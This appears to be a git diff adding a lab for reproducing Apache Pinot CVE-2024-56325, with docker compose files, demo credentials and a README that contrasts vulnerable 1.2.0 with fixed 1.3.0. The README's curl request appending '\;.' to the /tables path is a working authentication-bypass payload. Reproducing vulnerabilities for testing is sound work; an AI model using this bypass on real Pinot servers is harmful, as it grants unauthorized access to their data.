diff --git a/apache/pinot/CVE-2024-56325/README.md b/apache/pinot/CVE-2024-56325/README.md new file mode 100644 index 00000000..22d5a0ce --- /dev/null +++ b/apache/pinot/CVE-2024-56325/README.md @@ -0,0 +1,27 @@ +# setup vulnerable version +```bash +PINOT_VERSION=1.2.0 docker compose up +``` +## test vulnerable version +```bash +curl -v http://localhost:9000/tables +# 401 Unauthorized +# {"code":401,"error":"HTTP 401 Unauthorized"} +curl -v http://localhost:9000/tables\;. +# 200 OK +# {"tables":[]} +``` + +# setup fixed version +```bash +PINOT_VERSION=1.3.0 docker compose up +``` +## test secure version +```bash +curl -v http://localhost:9000/tables +# 401 Unauthorized +# {"code":401,"error":"HTTP 401 Unauthorized"} +curl -v http://localhost:9000/tables\;. +# 401 Unauthorized +# {"code":401,"error":"HTTP 401 Unauthorized"} +``` diff --git a/apache/pinot/CVE-2024-56325/broker.conf b/apache/pinot/CVE-2024-56325/broker.conf new file mode 100644 index 00000000..0f5e8341 --- /dev/null +++ b/apache/pinot/CVE-2024-56325/broker.conf @@ -0,0 +1,14 @@ +# broker settings +pinot.broker.client.queryPort=8099 +pinot.broker.routing.table.builder.class=random +pinot.broker.helix.cluster.name=PinotCluster +pinot.broker.zk.str=127.0.0.1:2181 +# no tokens required +# the factory class property is different for the broker +pinot.broker.access.control.class=org.apache.pinot.broker.broker.BasicAuthAccessControlFactory + +pinot.broker.access.control.principals=admin,user +pinot.broker.access.control.principals.admin.password=verysecret +pinot.broker.access.control.principals.user.password=secret + +# No need to set READ permissions here since broker requests are read-only \ No newline at end of file diff --git a/apache/pinot/CVE-2024-56325/controller.conf b/apache/pinot/CVE-2024-56325/controller.conf new file mode 100644 index 00000000..6b7a7594 --- /dev/null +++ b/apache/pinot/CVE-2024-56325/controller.conf @@ -0,0 +1,23 @@ +# controller settings +controller.helix.cluster.name=PinotCluster +controller.port=9000 +controller.data.dir=/tmp/pinot/controller +controller.zk.str=127.0.0.1:2181 +controller.host=pinot-controller + +# Create users "admin" and "user". Keep in mind we're not enforcing any ACLs yet. +controller.admin.access.control.principals=admin,user + +# Set the user's password to "secret" and allow "READ" only +controller.admin.access.control.principals.user.password=secret +controller.admin.access.control.principals.user.permissions=READ + +# Set the admin's password to "verysecret" +controller.admin.access.control.principals.admin.password=verysecret + +# Enable the controller to fetch segments by providing the credentials as a token +controller.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA + +# "Basic " + base64encode("admin:verysecret") + +controller.admin.access.control.factory.class=org.apache.pinot.controller.api.access.BasicAuthAccessControlFactory \ No newline at end of file diff --git a/apache/pinot/CVE-2024-56325/docker-compose.yaml b/apache/pinot/CVE-2024-56325/docker-compose.yaml new file mode 100644 index 00000000..350775dc --- /dev/null +++ b/apache/pinot/CVE-2024-56325/docker-compose.yaml @@ -0,0 +1,17 @@ +services: + pinot: + image: apachepinot/pinot:${PINOT_VERSION:-1.2.0} + container_name: pinot + working_dir: /opt/pinot + volumes: + - ./controller.conf:/opt/pinot/controller.conf:ro + - ./broker.conf:/opt/pinot/broker.conf:ro + - ./server.conf:/opt/pinot/server.conf:ro + - ./minion.conf:/opt/pinot/minion.conf:ro + - ./start-pinot.sh:/opt/pinot/start-pinot.sh + entrypoint: "/opt/pinot/start-pinot.sh" + ports: + - "9000:9000" + - "8099:8099" + - "8098:8098" + - "8097:8097" \ No newline at end of file diff --git a/apache/pinot/CVE-2024-56325/minion.conf b/apache/pinot/CVE-2024-56325/minion.conf new file mode 100644 index 00000000..2307d8f3 --- /dev/null +++ b/apache/pinot/CVE-2024-56325/minion.conf @@ -0,0 +1,6 @@ +# minion settings +pinot.minion.helix.cluster.name=PinotCluster +pinot.minion.zk.str=127.0.0.1:2181 + +segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA +task.auth.token=Basic YWRtaW46dmVyeXNlY3JldA \ No newline at end of file diff --git a/apache/pinot/CVE-2024-56325/server.conf b/apache/pinot/CVE-2024-56325/server.conf new file mode 100644 index 00000000..b109a107 --- /dev/null +++ b/apache/pinot/CVE-2024-56325/server.conf @@ -0,0 +1,10 @@ +# server settings +pinot.server.instance.dataDir=/tmp/pinot/server +pinot.server.instance.segmentTarDir=/tmp/pinot/server/segments +pinot.server.netty.port=8098 +pinot.server.helix.cluster.name=PinotCluster +pinot.server.zk.str=127.0.0.1:2181 + +pinot.server.segment.fetcher.auth.token=Basic YWRtaW46dmVyeXNlY3JldA +pinot.server.segment.uploader.auth.token=Basic YWRtaW46dmVyeXNlY3JldA +pinot.server.instance.auth.token=Basic YWRtaW46dmVyeXNlY3JldA \ No newline at end of file diff --git a/apache/pinot/CVE-2024-56325/start-pinot.sh b/apache/pinot/CVE-2024-56325/start-pinot.sh new file mode 100755 index 00000000..fefc4d47 --- /dev/null +++ b/apache/pinot/CVE-2024-56325/start-pinot.sh @@ -0,0 +1,23 @@ +#!/bin/bash + +nohup ./bin/pinot-admin.sh StartZookeeper -zkPort 2181 > zookeeper.log 2>&1 & +while ! grep -q 'Start zookeeper at localhost:2181 in thread main' zookeeper.log; do sleep 1; done +echo "Zookeeper started." + +nohup ./bin/pinot-admin.sh StartController -config controller.conf > controller.log 2>&1 & +while ! grep -q 'INFO: \[HttpServer\] Started.' controller.log; do sleep 1; done +echo "Controller started." + +nohup ./bin/pinot-admin.sh StartBroker -config broker.conf > broker.log 2>&1 & +while ! grep -q 'INFO: \[HttpServer\] Started.' broker.log; do sleep 1; done +echo "Broker started." + +nohup ./bin/pinot-admin.sh StartServer -config server.conf > server.log 2>&1 & +while ! grep -q 'INFO: \[HttpServer\] Started.' server.log; do sleep 1; done +echo "Server started." + +nohup ./bin/pinot-admin.sh StartMinion -configFileName minion.conf > minion.log 2>&1 & +while ! grep -q 'INFO: \[HttpServer\] Started.' minion.log; do sleep 1; done +echo "Minion started." + +tail -f zookeeper.log controller.log broker.log server.log minion.log \ No newline at end of file